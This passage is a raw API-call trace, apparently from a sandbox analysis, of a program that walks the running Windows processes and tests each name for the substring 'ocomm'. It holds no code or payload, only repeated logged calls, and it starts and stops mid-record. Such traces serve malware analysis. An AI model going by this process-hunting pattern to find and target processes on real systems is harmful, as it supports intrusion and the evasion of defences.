lpMultiByteStr=0x35738d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0095.733] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0095.733] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="ocomm") returned 0x0 [0095.733] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0095.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.734] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3573728 [0095.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3573728, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0095.734] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0095.734] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="ocomm") returned 0x0 [0095.734] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.735] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35738f0 [0095.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35738f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.735] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.735] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.735] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0095.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.737] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574da0 [0095.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3574da0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0095.737] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0095.737] StrStrIA (lpFirst="dwm.exe", lpSrch="ocomm") returned 0x0 [0095.737] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.738] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573908 [0095.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573908, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.738] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.738] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.738] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.740] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573920 [0095.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573920, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.740] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.740] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.740] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.741] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573938 [0095.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573938, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.741] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.741] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.741] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.742] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573968 [0095.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573968, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.742] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.742] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.742] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.744] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35737a0 [0095.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35737a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.744] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.744] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.744] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.745] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573698 [0095.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573698, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.745] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.745] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.745] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.746] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573770 [0095.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573770, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.746] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.746] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.746] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.747] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35737b8 [0095.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35737b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.747] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.747] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.747] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.748] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573b90 [0095.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573b90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.748] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.748] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.748] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.749] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573bd8 [0095.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573bd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.749] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.749] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.749] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0095.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.750] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573b60 [0095.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3573b60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0095.750] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0095.750] StrStrIA (lpFirst="spoolsv.exe", lpSrch="ocomm") returned 0x0 [0095.750] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.752] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573a40 [0095.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573a40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.752] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.752] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.752] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0095.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.753] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573a58 [0095.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3573a58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0095.753] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0095.753] StrStrIA (lpFirst="audiodg.exe", lpSrch="ocomm") returned 0x0 [0095.753] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0095.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.754] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35739b0 [0095.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x35739b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0095.755] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0095.755] StrStrIA (lpFirst="sihost.exe", lpSrch="ocomm") returned 0x0 [0095.755] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.756] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573b78 [0095.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573b78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.756] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.756] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.756] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0095.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.757] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3573c50 [0095.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3573c50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0095.757] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0095.757] StrStrIA (lpFirst="taskhostw.exe", lpSrch="ocomm") returned 0x0 [0095.757] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0095.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.758] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573a70 [0095.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3573a70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0095.758] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0095.758] StrStrIA (lpFirst="explorer.exe", lpSrch="ocomm") returned 0x0 [0095.758] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0095.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.759] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3574948 [0095.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3574948, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0095.759] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0095.759] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="ocomm") returned 0x0 [0095.759] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0095.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0095.760] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356ac40 [0095.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356ac40, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0095.760] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0095.761] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="ocomm") returned 0x0 [0095.761] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0095.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.762] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3574968 [0095.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3574968, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 